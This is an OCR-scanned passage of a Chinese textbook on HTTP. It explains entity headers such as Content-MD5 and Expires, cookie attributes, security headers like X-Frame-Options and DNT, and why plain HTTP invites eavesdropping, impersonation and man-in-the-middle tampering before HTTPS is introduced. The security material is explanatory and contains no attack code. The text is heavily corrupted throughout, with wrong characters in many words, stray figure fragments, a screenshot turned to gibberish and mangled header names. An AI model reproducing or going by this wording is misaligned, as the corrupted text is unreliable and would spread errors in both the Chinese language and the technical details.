Content -MD5 : OGFKZDUwNGVNNGY3N2MxMDIwZmQ4NTBmY2IyTY== 


= 


首部 字段 Content-MDS5 是 一 串 由 MD5 算法 生成 的 值 ， 其 目的 在 于 
检查 报 文 主体 在 传输 过 程 中 是 否 保持 完整 ， 以 及 确认 传输 到 达 。 

对 报 文 主体 执行 MD5 算法 获得 的 128 位 二 进 制 数 ， 再 通过 Base64 
编码 后 将 结果 写 入 Content-MD5 字段 值 。 由 于 HTTP 首部 无 法 记录 二 进 
制 值 ， 所 以 要 通过 Base64 编码 处 理 。 为 确保 报 文 的 有 效 性 ， 作 为 接收 
方 的 客户 端 会 对 报 文 主体 再 执行 一 次 相同 的 MD5 算法 。 计 算出 的 值 与 
字段 值 作 比 较 后 ， 即 可 判断 出 报 文 主体 的 准确 性 。 

采用 这 种 方法 ， 对 内 容 上 的 偶发 性 改变 是 无 从 查证 的 ， 也 无 法 检测 
出 恶意 算 改 。 其 中 一 个 原因 在 于 ， 内 容 如 果 能 够 被 算 改 ,那么 同时 意味 
着 Content-MD5 也 可 重新 计算 然后 被 自 改 。 所 以 处 在 接收 阶段 的 客户 闹 
是 无 法 意识 到 报 文 主体 以 及 首部 字段 Content-MD5 是 已 经 被 算 改 过 的 。 


6.6.7 Content-Range 





杷 那 些 部 分 发 送 给 我 





全 部 i0000 字 节 内 ， 先 
发 送 so001~i0000 字 邓 
则 次 泪 吧 


HTTP/1.1 206 Partial Content 

Date: Wed, 04 Jul 2012 07:28:03 GMT 
Content-Range: bytes 5001-10000/10000 
Content-Length: 5000 

Content-Type: image/jpeg 
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Content -Range: bytes 5001-10000/10000 


针对 范围 请 求 ， 返 回 啊 应 时 使 用 的 首部 字段 Content-Range， 能 告 
知客 户 端 作为 响应 返回 的 实体 的 哪个 部 分 符合 范围 请 求 。 字 段 值 以 字 节 
为 单位 ， 表 示 当 前 发 送 部 分 及 整个 实体 大 小 。 


6.6.8 Content-Type 


Content-Type: text/html; charset=UTF-8 


首部 字段 Content-Type 说 明了 实体 主体 内 对 象 的 媒体 类 型 。 和 首部 
字段 Accept 一 样 ， 字 有 段 值 用 type/subtype 形式 赋值 。 


131 
参数 charset 使 用 iso-8859-1 或 euc-jp 等 字符 集 进行 赋值 。 


6.6.9 上 Xplres 





该 中 源 你 可 以 使 用 到 
2012 年 7 月 4 日 






源 服务 器 


Expires: Wed, 04 Jul 2012 08:26:05 GMT 


首部 字段 Expires 会 将 资源 失效 的 日 期 告知 客户 端 。 缓 存 服务 天 在 
接收 到 含有 首部 字段 Expires 的 响应 后 ， 会 以 缓存 来 应 答 请 求 ， 在 


村 司 天 < 


加 轧 “nn 





Expires 字段 值 指定 的 时 间 之 前 ， 啊 应 的 副本 会 一 直 被 保存 。 当 超过 
指定 的 时 间 后 ， 绥 存 服务 器 在 请 求 发 送 过 来 时 ， 会 转 回 源 服务 需 请 求 
资源 。 

源 服 务 大 不 布 望 缓存 服务 硕 对 资源 缓存 时 ， 最 好 在 Expires 字段 内 
写 人 与 首部 字段 Date 相同 的 时 间 值 。 

但 是 ， 当 首部 字段 Cache-Control 有 指定 max-age 指令 时 ， 比 起 首 
部 字段 Expires， 会 优先 处 理 max-age 指令 。 


6.6.10 Last-Modified 





Last-Modified: Wed, 23 May 2012 09:59:55 GMT 


首部 字段 Last-Modified 指明 资源 最 终 修 改 的 时 间 。 一 般 来 说 ， 这 
个 值 就 是 Request-URI 指定 资源 被 修改 的 时 间 。 但 类 似 使 用 CGI 脚本 进 
行动 态 数据 处 理 时 ， 该 值 有 可 能 会 变 成 数据 最 终 修改 时 的 时 间 。 


6.7 ”为 Cookie 服务 的 首部 字段 


管理 服务 需 与 客户 端 之 间 状 态 的 Cookie， 虽然 没有 被 编 人 标准 化 
HTTP/1.1 的 RFC2616 中 ,但 在 Web 网 站 方面 得 到 了 广泛 的 应 用 。 

Cookie 的 工作 机 制 是 用 户 识 别 及 状态 管理 。Web 网 站 为 了 管理 用 户 
的 状态 会 通过 Web 浏览 融 ， 把 一 些 数据 临时 写 入 用 户 的 计算 机 内 。 接 
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着 当 用 户 访问 该 Web 网 站 时 ， 可 通过 通信 方式 取 回 之 前 发 放 的 
Cookle。 

调用 Cookie 时 ， 由 于 可 校 验 Cookie 的 有 效 期 ， 以 及 发 送 方 的 域 、 
路 径 、 协 议 等 信息 ， 所 以 正规 发 布 的 Cookie 内 的 数据 不 会 因 来 自 其 他 
Web 站 点 和 攻击 者 的 攻击 而 泄露 。 

至 2013 年 5 月 ，Cookie 的 规格 标准 文档 有 以 下 4 种 。 


由 网 不公 司 颁布 的 规格 标准 

网 景 通信 公司 设计 并 开发 了 Cookie， 并 制定 相关 的 规格 标准 。1994 
年 前 后 ，Cookie 正式 应 用 在 网 景 浏览 融 中 。 目 前 最 为 普及 的 
Cookie 方式 也 是 以 此 为 基准 的 。 


RFC2109 

某 企业 尝试 以 独立 技术 对 Cookie 规格 进行 标准 化 统筹 。 原 本 的 意 
图 是 想 和 网 景 公司 制定 的 标准 交互 应 用 ， 可 惜 发 生 了 微妙 的 差异 。 
现在 该 标准 已 淡出 了 人 们 的 视线 。 





RFCG2965 

为 终结 Internet Explorer 浏览 器 与 Netscape Navigator 的 标准 差异 而 
导致 的 浏览 器 战争 ，RFC2965 内 定义 了 新 的 HTTP 首部 Set- 
Cookie2 和 Cookie2。 可 事实 上 ， 它 们 几乎 没 怎么 投入 使 用 。 


RFC6265 
将 网 景 公 司 制 定 的 标准 作为 业界 事实 标准 ( De facto standard )， 重 
新 定义 Cookie 标准 后 的 产物 。 


目前 使 用 最 广泛 的 Cookie 标准 却 不 是 RFC 中 定义 的 任何 一 个 。 而 
是 在 网 景 公 司 制定 的 标准 上 进行 扩展 后 的 产物 。 

本 广 接 下 来 就 对 目前 使 用 最 为 广泛 普及 的 标准 进行 说 明 。 

下 面 的 表格 内 列举 了 与 Cookie 有 关 的 首部 字段 。 





相 


四 | 
| 全 面 -三 | 
一 wr . 一 


表 6-8: 为 Cookie 服务 的 首部 字段 





人 ea 


我 拿 好 这 个 
Cookie 4 









Cookie 首部 
6.7.1 Set-Cookie 


Set-Cookie: status=enable; expires=Tyue, 05 Jul 2011 07:26:31 GMT 一 
path=/; domain= .hackr .ip; 
当 服 务 硕 准 和 省 开始 管理 客户 闪 的 状态 时 ， 会 事先 告知 各 种 信息 。 
下 面 的 表格 列举 了 Set-Cookie 的 字段 值 。 


表 6-9: Set-Cookie 字段 的 属性 


NAME=VALUE 赋予 Cookie 的 名 称 和 其 值 ( 必需 项 ) 
各 定 则 默认 为 浏览 器 关闭 前 为 止 





oath=PATH 将 服务 器 上 的 文件 目录 作为 Cookie 的 适用 对 象 ( 若 不 指定 则 
默认 为 文档 所 在 的 文件 目录 ) 

domain= 域名 作为 Cookie 适 用 对 象 的 域名 ( 若 不 指定 则 默认 为 创建 Cookie 
的 服务 器 的 域名 ) 





PR 
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( 续 ) 
仅 在 HTTPS 安全 通信 时 才 会 发 送 Cookia 
加 以 限制 ， 使 Cookie 不 能 被 JavaScript 脚 本 访 站 


expires 属性 

Cookie 的 expires 属性 指定 浏览 器 可 发 送 Cookie 的 有 效 期 。 

当 省 略 expires 属性 时 ， 其 有 效 期 仅 限 于 维持 训 览 疮 会 话 〈 Session ) 
时 间 段 内 。 这 通常 限于 浏览 器 应 用 程序 被 关闭 之 前 。 

另外 ， 一旦 Cookie 从 服务 器 端 发 送 至 客户 端 ， 服务 器 端 就 不 存在 
可 以 显 式 删除 Cookie 的 方法 。 但 可 通过 覆盖 已 过 期 的 Cookie， 实 现 对 
客户 疹 Cookie 的 实质 性 删除 操作 。 












path 属性 

Cookie 的 path 属性 可 用 于 限制 指定 Cookie 的 发 送 范 围 的 文件 目 
录 。 不 过 另 有 办 法 可 避 开 这 项 限制 ， 看 来 对 其 作为 安全 机 制 的 效果 不 能 
抱 有 期 待 。 


domain 属性 

通过 Cookie 的 domain 属性 指定 的 域名 可 做 到 与 结尾 匹配 一 致 。 比 
加 ， 当 指定 example.com 后 ， 除 example.com 以 外 ，www.example.com 
或 www2.example.com 等 都 可 以 发 送 Cookie。 

因此 ， 除 了 针对 具体 指定 的 多 个 域名 发 送 Cookie 之 外 ， 不 指定 
domain 属性 显得 更 安全 。 


secure 属性 

Cookie 的 secure 属性 用 于 限制 Web 页 面 仅 在 HTTPS 安全 连接 时 ， 
才 可 以 发 送 Cookie。 

发 送 Cookie 时 ， 指 定 secure 属性 的 方法 如 下 所 示 。 








Set-Cookie; name=value; secure 


以 上 例子 仅 当 在 https : /www.example.com/( HTTPS ) 安全 连接 的 
情况 下 才 会 进行 Cookie 的 回收 。 也 就 是 说 ， 即 使 域名 相同 ，http://www. 
example.com/( HTTP ) 也 不 会 发 生 Cookie 回收 行为 。 

当 省 略 secure 属性 时 ， 不 论 HTTP 还 是 HTTPS， 都 会 对 Cookie 进 
行 回收 。 


HttpOnly 属性 

Cookie 的 HttpOnly 属性 是 Cookie 的 扩展 功能 ， 它 使 JavaScript 脚 
本 无 法 获得 Cookie。 其 主要 目的 为 防止 跨 站 脚本 攻击 ( Cross-site 
scripting，XSS ) 对 Cookie 的 信息 守 取 。 

发 送 指 定 HttpOnly 属性 的 Cookie 的 方法 如 下 所 示 。 


Set-Cookie: name=value; HttpOnly 


通过 上 述 设置 ， 通常 从 Web 页 面 内 还 可 以 对 Cookie 进行 读 取 操作 。 
但 使 用 JavaScript 的 document.cookie 就 无 法 读 取 附加 HttpOnly 属性 后 
的 Cookie 的 内 容 了 。 因 此 ， 也 就 无 法 在 XSS 中 利用 JavaScript 劫持 
Cookie 了 。 

虽然 是 独立 的 扩展 功能 ， 但 Internet Explorer 6 SP1 以 上 版 本 等 当下 
的 主流 浏览 器 都 已 经 支持 该 扩展 了 。 另 外 顺带 一 提 ， 该 扩展 并 非 是 为 了 
防止 XSS 而 开发 的 。 


6.7.2 Cookie 


Cookie: status=enable 
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首部 字段 Cookie 会 告知 服务 器 ， 当 客户 端 想 获得 HTTP 状态 管理 
支持 时 ， 就 会 在 请 求 中 包含 从 服务 器 接收 到 的 Cookie。 接 收 到 多 个 
Cookie 时 ， 同 样 可 以 以 多 个 Cookie 形式 发 送 。 


6.8 ”其 他 首部 字段 


HTTP 首部 字段 是 可 以 自行 扩展 的 。 所 以 在 Web 服务 右 和 浏览 器 的 
应 用 上 ， 会 出 现 各 种 非 标准 的 首部 字段 。 
接 下 来 ， 我 们 就 一 些 最 为 常用 的 首部 字段 进行 说 明 。 


® X-Frame-Options 
@ X-XIS-Protection 
se DNT 
@ P3P 


6.8.1 X-Frame-Options 
"a DENY 


首部 字段 X-Frame-Options 属于 HTTP 响应 首部 ， 用 于 控制 网 站 内 
容 在 其 他 Web 网 站 的 Frame 标签 内 的 显示 问题 。 其 主要 目的 是 为 了 防 
止 点 击 支持 ( clickjacking ) 攻击 。 

首部 字段 X-Frame-Options 有 以 下 两 个 可 指定 的 字段 值 。 


es DENY : 拒绝 

。 SAMEORIGIN : 仅 同 源 域名 下 的 页 面 ( Top-level-browsing-context ) 
匹配 时 许可 。( 比如 ， 当 指定 http://hackr.jp/sample.html 页 面 为 
SAMEORIGIN 时 ， 那么 hackrjp 上 所 有 页 面 的 frame 都 被 允许 可 
加 载 该 页 面 ， 而 example.com 等 其 他 域名 的 页 面 就 不 行 了 ) 





裔 局 加 
ee 


文 持 该 首部 字段 的 浏览 占有 ;: Internet Explorer 8、Firefox 3.6.9+、 
Chrome 4.1.249.1042+、Safari 4+ 和 Opera 10.50+ 等 。 现 在 主流 的 训 览 
器 都 已 经 支持 。 

能 在 所 有 的 Web 服务 需 冰 预先 设 定 好 X-Frame-Options 字段 值 是 最 
理想 的 状态 。 


对 apache2.conf 的 配置 实例 
<IfModule mod headers.c> 


Header append X-FRAME-OPTIONS "SAMEORIGIN" 
</IfModule> 


6.8.2 和 XA-XSS-Protection 
X-XSS-Protection: 1 


首部 字段 X-XSS-Protection 属于 HTTP 啊 应 首部 ， 它 是 针对 路 站 脚 
本 攻击 ( XSS ) 的 一 种 对 策 ， 用 于 控制 浏览 器 XSS 防护 机 制 的 开关 。 
自 部 字段 X-XSS-Protection 可 指定 的 字段 值 如 下 。 


。 0 ; 将 XSS 过 滤 设 置 成 无 效 状态 
。1 : 将 XSS 过 滤 设 置 成 有 效 状 态 


6.8.3 DNT 






我 不 会 怒 我 的 信 
息 交 给 你 的 ! 





服务 器 
DNT 首部 
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DNT: 1 


首部 字段 DNT 属于 HTTP 请 求 首部 ， 其 中 DNT 是 Do Not Track 
的 价 称 ， 意 为 拒绝 个 人 信息 被 收集 ， 是 表示 拒绝 被 精准 广告 追踪 的 一 
种 方法 。 


首部 字段 DNT 可 指定 的 字段 值 如 下 。 


.0: 同意 被 追踪 
s 1] : 拒绝 被 追踪 


由 于 月 部 字段 DNT 的 功能 具备 有 效 性 ， 所 以 Web 服务 器 需要 对 
DNT 做 对 应 的 文 持 。 


6.8.4 P3P 


P3P:， CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa SO 
IVAa IVDa OUR BUS IND UNI COM NAV INT" 


首部 字段 P3P 属于 HTTP 相应 首部 ， 通 过 利用 P3P ( The Platform 
for Privacy Preferences， 在 线 隐私 偏好 平台 ) 技术 ， 可 以 让 Web 网 站 上 
的 个 人 隐私 变 成 一 种 仅 供 程序 可 理解 的 形式 ， 以 达到 保护 用 户 隐 私 的 
目的 。 

要 进行 P3P 的 设 定 ， 需 按 以 下 操作 步骤 进行 。 


步骤 1: ”创建 P3P 隐私 

步骤 2: ”创建 P3P 隐私 对 照 文 件 后 ， 保 存 命 名 在 /w3c/p3p.xml 

步骤 3: ”从 P3P 隐私 中 新 建 Compact policies 后 ， 输 出 到 HTTP 响 
应 中 








http://www.w3.org/TR/P3P/ 





| 
| 
是 


i 


可 请 


ee 


i 


了 


nt 
> 
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Em 
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第 7 章 
确保 Web 安全 的 HTTPS 





在 HTTP 协 议 中 有 可 能 存在 信息 窃听 或 身份 伪 闭 等 安全 问题 。 使 
用 HTTPS 通信 机 制 可 以 有 效 地 防止 这 些 问题 。 本 章 我 们 就 了 解 一 
下 HTTPS。 











7.1 HTTP 的 缺点 


到 现在 为 止 ， 我 们 已 了 解 到 HTTP 具有 相当 优秀 和 方便 的 一 面 ， 然 
而 HTTP 并非 只 有 好 的 一 面 ， 事 物 皆 具 两 面 性 ， 它 也 是 有 不 足 之 处 的 。 
HTTP 主要 有 这 些 不 足 ， 例 举 如 下 。 


9 通信 使 用 明文 【不 加 密 )， 内 容 可 能 会 被 窍 昕 
9 个 验证 通信 方 的 身份 ， 因 此 有 可 能 遭遇 伪 奢 
9 无 法 证 明报 文 的 完整 性 ， 所 以 有 可 能 已 这 纂 改 


这 些 问 题 不 仅 在 HTTP 上 出 现 ， 其 他 未 加 密 的 协议 中 也 会 存在 这 类 
问题 。 

除 此 之 外 ，HTTP 本 身 还 有 很 多 缺点 。 而 且 ， 还 有 像 菜 些 特定 的 
Web 服务 蔡 和 特 定 的 Web 浏览 副 在 实际 应 用 中 存在 的 不 是 (也 可 以 说 
成 是 脆 昼 性 或 安全 漏洞 )， 另 外 , 用 Java 和 PHP 等 编程 语言 开发 的 Web 
应 用 也 可 能 存在 安全 漏洞 。 


7.1.1 通信 使 用 明文 可 能 会 被 窃听 

由 于 HTTP 本 身 不 具备 加 密 的 功能 ， 所 以 也 无 法 做 到 对 通信 整体 
(使 用 HTTP 协议 通信 的 请 求 和 响应 的 内 容 ) 进行 加 密 。 即 ，HTTP 报 
文 使 用 明文 ( 指 未 经 过 加 密 的 报 文 ) 方式 发 送 。 


国 TCP/IP 是 可 能 被 窃听 的 网 络 
如 果 要 问 为 什么 通信 时 不 加 密 是 一 个 缺点 ， 这 是 因为 ， 按 TCP/IP 
协议 族 的 工作 机 制 ， 通 信 内 容 在 所 有 的 通信 线路 上 都 有 可 能 遭 到 宕 视 。 
所 谓 互联 网 ， 是 由 能 连通 到 全 世界 的 网 络 组 成 的 。 无 论 世 界 哪个 角 
沙 的 服务 硕 在 和 客户 端 通 信 时 ， 在 此 通信 线路 上 的 某 些 网 络 设备 、 光 
缆 、 计 算 机 等 都 不 可 能 是 个 人 的 私有 物 ， 所 以 不 排除 某 个 环节 中 会 遭 到 
恶意 帘 视 行为 。 
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即使 已 经 过 加 密 处 理 的 通信 ， 也 会 被 舌 视 到 通信 和 内容， 这 点 和 未 加 
密 的 通信 和 是 相同 的 。 只 是 说 如 果 通 信 经 过 加 密 ， 就 有 可 能 让 人 无 法 破解 
报 文 信息 的 含义 ,但 加 密 处 理 后 的 报 文 信息 本 号 还 是 会 馈 看 到 的 。 





: 互联 网 上 的 任何 角落 都 存在 通信 内 容 被 窃听 的 风险 


祝 听 相同 段 上 的 通信 并 非 难 事 。 只 需要 收集 在 互联 网 上 流动 的 数据 
包 ( 帧 ) 就 行 了 。 对 于 收集 来 的 数据 包 的 解析 工作 ， 可 区 给 那些 抓 包 
( Packet Capture ) 或 嗅 探 妖 ( Sniffer ) 工具 。 

下 面 的 图 片 示例 就 是 被 广泛 使 用 的 抓 包工 具 Wireshark。 它 可 以 获 
取 HTTP 协议 的 请 求 和 啊 应 的 内 容 ， 并 对 其 进行 解析 。 

像 使 用 GET 方法 发 送 请 求 、 啊 应 返回 了 200 OK， 查 看 HTTP 啊 应 
报 文 的 全 部 内 容 等 一 系列 的 事情 都 可 以 做 到 。 





Ta atbe Lb Ci EO ) | 


Date: Fri, 13 ul 203 O23:26 GAT\FIN 
Sarver: Apaehe rn 
Last-odified: Fris TH ug 2007 02:02:20 GTurvun 
ETag: "asbael -16a-40d775ac” rn 
hecept -Rarges: bytes\r\n 
Content-Length: 362\r\n 
Eormeection: Close\r\n 
Conternt=Type!: Taxr/heeal\r\n 
‘rn 


a 





图 : Wireshark ( http://www.wireshark.org/ ) 


国 加 密 处 理 防 止 被 窃听 


在 目前 大 家 正在 研究 的 如 何 防 止 窃听 保护 信息 的 几 种 对 策 中 ， 最 为 
普及 的 就 是 加 密 技 术 。 加 密 的 对 象 可 以 有 这 么 几 个 。 


通信 的 加 密 

一 种 方式 就 是 将 通信 和 加密。HTTP 协议 中 没有 加 密 机 制 ， 但 可 以 通 
过 和 SSL ( Secure Socket Layer， 安 全 套 接 层 ) 或 TLS ( Transport Layer 
Security， 安 全 层 传输 协议 ) 的 组 合 使 用 ， 加 密 HTTP 的 通信 和 内容 。 

用 SSL 建立 安全 通信 线路 之 后 ， 就 可 以 在 这 条 线路 上 进行 HTTP 
通信 了 。 与 SSL 组 合 使 用 的 HTTP 被 称 为 HTTPS ( HTTP Secure， 超 文 
本 传输 安全 协议 ) 或 HTTP over SSL。 
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客户 端 服务 器 





内 容 的 加 密 

还 有 一 种 将 参与 通信 的 内 容 本 身 加 密 的 方式 。 由 于 HTTP 协议 中 没 
有 加 密 机 制 ， 那么 就 对 HTTP 协议 传输 的 内 容 本 身 加 密 。 即 把 HTTP 报 
文 里 所 含 的 内 容 进行 加 密 处 理 。 

在 这 种 情况 下 ， 客 户 端 需要 对 HTTP 报 文 进行 加 密 处 理 后 再 发 送 








请 求 。 
: 这 时 面 的 内 容 人 被 加 密 处 理 通信 本 
身 是 不 加 密 的 】 
诚然 ， 为 了 做 到 有 效 的 内 容 加 密 ， 前 提 是 要 求 客 户 病 和 服务 器 同时 


具备 加 密 和 解密 机 制 。 主 要 应 用 在 Web 服务 中 。 有 一 点 必须 引起 注意 ， 
由 于 该 方式 不 同 于 SSL 或 TLS 将 整个 通信 线路 加 密 处 理 ， 所 以 内 容 仍 
有 被 算 改 的 风险 。 稍 后 我 们 会 加 以 说 明 。 


1 ] 于 
| 加 有 





7.1.2 不 验证 通信 方 的 身份 就 可 能 遭遇 伪装 

HTTP 协议 中 的 请 求 和 响应 不 会 对 通信 方 进行 确认 。 也 就 是 说 存在 
“服务 器 是 否 就 是 发 送 请 求 中 URI 真正 指定 的 主机 ， 返 回 的 响应 是 否 真 
的 返回 到 实际 提出 请 求 的 客户 端 ” 等 类 似 问题 。 


图 任何 人 都 可 发 起 请 求 
在 HTTP 协议 通信 时 ， 由 于 不 存在 确认 通信 方 的 处 理 步 又， 任何 人 
都 可 以 发 起 请 求 。 男 外 ， 服 务 器 只 要 接收 到 请 求 ， 不 管 对 方 是 谁 都 会 返 
一 个 响应 (但 也 仅 限于 发 送 端 的 IP 地 址 和 端口 号 没有 被 Web 服务 器 
设 定 限 制 访问 的 前 提 下 )。 


忆 不 管 你 们 是 堆 我 | 

PE 客户 端 z ev 有 
4 了 服务 器 

的 y : 对 请 求 来 者 不 拒 


HTTP 协议 的 实现 本 身 非常 简单 ， 不 论 是 谁 发 送 过 来 的 请 求 都 会 返 
回 啊 应 ， 因 此 不 确认 通信 方 ， 会 存在 以 下 各 种 隐患 。 









e 无 法 确定 请 求 发 送 至 目标 的 Web 服务 器 是 否 是 按 真实 意图 返回 
响应 的 那 谷 服务 瘟 。 有 可 能 是 已 伪 洲 的 Web 服务 前 。 

9 无 法 确定 响应 返回 到 的 客户 端 是 否 是 按 真实 意图 接收 响应 的 那个 
客 尸 端 。 有 可 能 是 已 伪装 的 客 尸 端 。 

9 无 法 确定 正在 通信 的 对 方 是 否 具备 访问 权限 。 因 为 某 些 Web 服 
务 器 上 保存 着 重要 的 信息 ， 只 想 发 给 特定 用 户 通信 的 权限 。 
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9 无 法 判定 请 求 是 来 自 何方 、 出 自 谁 手 。 
9 即使 是 无 意义 的 请 求 也 会 照 单 全 收 。 无 法 阻止 海量 请 求 下 的 DoS 
攻击 ( Denial of Service， 拒 绝 服务 攻击 )。 


夯 查 明 对 手 的 证 书 
虽然 使 用 HTTP 协议 无 法 确定 通信 方 ， 但 如 果 使 用 SSL 则 可 以 。 
SSL 不 仅 提 供 加 密 处 理 ， 而 且 还 使 用 了 一 种 被 称 为 证 书 的 手段 ， 可 用 于 
确定 方 。 
证 书 由 值得 信任 的 第 三 方 机 构 颁 发 ， 用 以 证 明 服 务 器 和 客户 端 是 实 
际 存在 的 。 男 外 ,伪造 证 书 从 技术 角度 来 说 是 异常 困难 的 一 件 事 。 所 以 
只 要 能 够 确认 通信 方 ( 服务 器 或 客户 端 ) 持 有 的 证 书 ， 即 可 判断 通信 方 
的 真实 意图 。 
我 已 确认 ， 这 人 台 服 务 器 


的 确 是 A 公 司 的 Web 网 | 
站 服务 器 | 


~ 
| 





| “客户 端 在 开始 通信 之 前 先 确认 
| 服务 器 的 证 书 | 













咽 ， 看 来 我 准备 访问 则 






“A 公司 的 | 
就是 A 公 司 的 Wek 月 站 Web 网 站 服务 器 | 普遍 已 获得 社会 认可 的 
89 企业 或 组 织 机 构 。 





通过 使 用 证 书 ， 以 证 明 通 信 方 就 是 意料 中 的 服务 副 。 这 对 使 用 者 个 
人 来 讲 ， 也 减少 了 个 人 信息 泄露 的 危险 性 。 

为 外 ， 客 尸 端 持 有 证 书 即 可 完成 个 人 号 份 的 确认 ， 也 可 用 于 对 Web 
网 站 的 认证 环 市 。 











7.1.3 ”无 法 证 明报 文 完 整 性 ， 可 能 已 遭 夏 改 
所 谓 完整 性 是 指 信息 的 准确 度 。 若 无 法 证 明 其 完整 性 ， 通 党 也 就 意 
味 看 无 法 判断 信息 是 否 准确 。 


国 接 收 到 的 内 容 可 能 有 误 

由 于 HTTP 协议 无 法 证 明 通信 的 报 文 完整 性 ， 因 此 ， 在 请 求 或 响应 
送出 之 后 直到 对 方 接收 之 前 的 这 段 时 间 内 ， 即 使 请 求 或 啊 应 的 内 容 遭 到 
算 改 ,也 没有 办 法 获悉 。 

换 句 话说 ， 没 有 任何 办 法 确认 ， 发 出 的 请 求 /响应 和 接收 到 的 请 
求 / 啊 应 是 前 后 相同 的 。 


@) 
ET 


客户 庙 无 法 判断 A 和 B 是 相同 的 


比如 ， 从 某 个 Web 网 站 上 下 载 内 容 ， 是 无 法 确定 客户 问 下 载 的 文 
件 和 服务 关上 存放 的 文件 是 否 前 后 一 致 的。 文件 内 容 在 传输 途中 可 能 已 
经 被 算 改 为 其 他 的 内 容 。 即 使 内 容 真 的 已 改变 ， 作 为 接收 方 的 客户 冰 也 
是 觉察 不 到 的 。 

像 这 样 ， 请 求 或 啊 应 在 传输 途中 ， 遭 攻击 者 拦截 并 自 改 内 容 的 攻击 
称 为 中 间 人 攻击 ( Man-in-the-Middle attack，MITM )。 


”中途 可 能 被 自 改 
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原本 想 在 服务 器 与 客户 端 之 间 进 行 通信 :…… 


攻击 人 会 随意 答 改 请 求 和 响应 ， 而 让 客户 端 与 服务 器 之 间 的 





图 : 中 间 人 攻击 


国 如 何 防 止 复 改 
虽然 有 使 用 HTTP 协议 确定 报 文 完整 性 的 方法 ， 但 事实 上 并 不 便 
捷 、 可 靠 。 其 中 常用 的 是 MDS 和 SHA-1 等 散 列 值 校 验 的 方法 ， 以 及 用 


来 确认 文件 的 数字 签名 方法 。 


Apache HTTP Server 2 4 二 thttpd): 2.4.2 i153 the latest available Version 2012-04.17 
The Apache HTTP Server Project 5 pleased th announce the release of version 2 4.2 of tlhe Apache HTTP 


Server CApache” and http] This version of Apache is our 2md GA release of the Few generation 2.4 5 
branch of Apache HTTPD and represents ffieen years of nnovation by the prolectl and 5 recommended 


Over all previous releases! 
For details see the Official Announcement and the CHANGES 2.4 and CHANGES 2 42 lists 


s Unix SOource htipd-2 42.tarbz2 [PGP ][ MDS }{ SHA1 ] 
s Unix Source: hltpd-2 4 2 tar gz [ PGP ] [ MDS ] [ SHA1 ] 


Download - The Apache HTIP Server Project 
htips/httpdapache.org/ download.cgi 





提供 文件 下 载 服务 的 Web 网 站 也 会 提供 相应 的 以 PGP ( Pretty Good 
Privacy， 完 美 隐私 ) 创建 的 数字 签名 及 MD5 和 法 生成 的 散 列 值 。PGP 


是 用 来 证 明 创 建文 件 的 数字 签名 ，MD5 是 由 单 回 晒 数 生成 的 散 列 全。 





不 论 使 用 哪 一 种 方法 ， 都 需要 操纵 客户 端的 用 户 本 人 亲自 检查 验证 下 载 
的 文件 是 否 就 是 原来 服务 器 上 的 文件 。 浏 览 器 无 法 目 动 帮 用 户 检查 。 

可 惜 的 是 ， 用 这 些 方法 也 依然 无 法 百 分 百 保证 确认 结果 正确 。 因 为 
PGP 和 MDS 本 身 被 改写 的 话 ， 用 户 是 没有 办 法 意识 到 的 。 

为 了 有 效 防 止 这 些 丙 端 ， 有 必要 使 用 HTTPS。SSL 提供 认证 和 加 
密 处 理 及 摘要 功能 。 仅 靠 HTTP 确保 完整 性 是 非常 困难 的 ， 因 此 通过 和 
其 他 协议 组 合 使 用 来 实现 这 个 目标 。 下 节 我 们 介绍 HTTPS 的 相关 内 容 。 


7.2 HTTP+ 加 密 + 认证 + 完整 性 保护 =HTTPS 


7.2.1 HTTP 加 上 加 密 处 理 和 认证 以 及 完整 性 保护 后 即 是 HTTPS 
如 果 在 HTTP 协议 通信 过 程 中 使 用 未 经 加 密 的 明文 ， 比 如 在 Web 页 面 
中 输入 信用 卡号 ， 如 果 这 条 通信 线路 遭 到 窃听 ,那么 信用 卡号 就 暴露 了 。 
另外 ， 对 于 HTTP 来 说 ， 服 务 器 也 好 ， 客 户 端 也 好 ， 都 是 没有 办 法 
确认 通信 方 的 。 因 为 很 有 可 能 并 不 是 和 原本 预想 的 通信 方 在 实际 通信 。 
并 且 还 需要 考虑 到 接收 到 的 报 文 在 通信 途中 已 经 遭 到 算 改 这 一 可 能 性 。 
为 了 统一 解决 上 述 这 些 问题 ， 需 要 在 HTTP 上 再 加 入 加 密 处 理 和 认证 等 
机 制 。 我 们 把 添加 了 加 密 及 认证 机 制 的 HTTP 称 为 HTTPS( HTTP Secure )。 


HTTP+ 通信 加 密 + 证 书 + 完 整 性 保护 。 一 > 









证 书 可 证 明 服务 器 或 客户 端的 身份 


图 ; 使 用 HTTPS 通信 
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经 常会 在 Web 的 登录 页 面 和 购物 结算 界面 等 使 用 HTTPS 通信 。 使 
用 HTTPS 通信 时 ， 不 再 用 http://， 而 是 改 用 https://。 男 外 ， 当 浏览 器 
访问 HTTPS 通信 有 效 的 Web 网 站 时 ， 浏 览 器 的 地 址 栏 内 会 出 现 一 个 带 
锁 的 标记 。 对 HTTPS 的 显示 方式 会 因 浏 览 右 的 不 同 而 有 所 改变 。 


hitter Com 
: 于 | 此 网 站 的 身 全 已 经 过 VerSign Cess3 
Extended Validation SSLCA 验证。 


与 twitter.com 的 连 溢 采用 128 位 加 密 
司 让 


该 连接 使 用 TLS 1.0. 
一 RC4_128 进行 加 密 的 ， 
身 众 验证 


同时 使 用 忠信 
一 ECDHE po 作为 密 外 交 挤 机 


该 连 援 未 进行 压缩 处 理 ， 
网 站 信息 
您 以 前 从 未 访问 过 此 网站 ， 
Twitter . 
应 再 


ll Gre Youl 
rieresésls and be m her 





7.2.2 HTTPS 是 身 披 SSL 外 壳 的 HTTP 

HTTPS 并 非 是 应 用 层 的 一 种 新 协议 。 只 是 HTTP 通信 接口 部 分 用 
SSL ( Secure Socket Layer ) 和 TLS ( Transport Layer Security ) 协议 代替 
而 已 。 

通常 ，HTTP 直接 和 TCP 通信 。 当 使 用 SSL 时 ， 则 演变 成 先 和 
SSL 通信 ， 再 由 SSL 和 TCP 通信 了 。 简 言 之 , 所谓 HTTPS， 其 实 就 是 
身 披 SSL 协议 这 层 外 学 的 HTTP。 








HTTPS 


在 采用 SSL 后 ，HTTP 就 拥有 了 HTTPS 的 加 密 、 证 书 和 完整 性 保 
护 这 些 功 能 。 

SSL 是 独立 于 HTTP 的 协议 ， 所 以 不 光 是 HTTP 协议 ， 其 他 运行 在 
应 用 层 的 SMTP 和 Telnet 等 协议 均 可 配合 SSL 协议 使 用 。 可 以 说 SSL 
是 当今 世界 上 应 用 最 为 广泛 的 网 络 安全 技术 。 


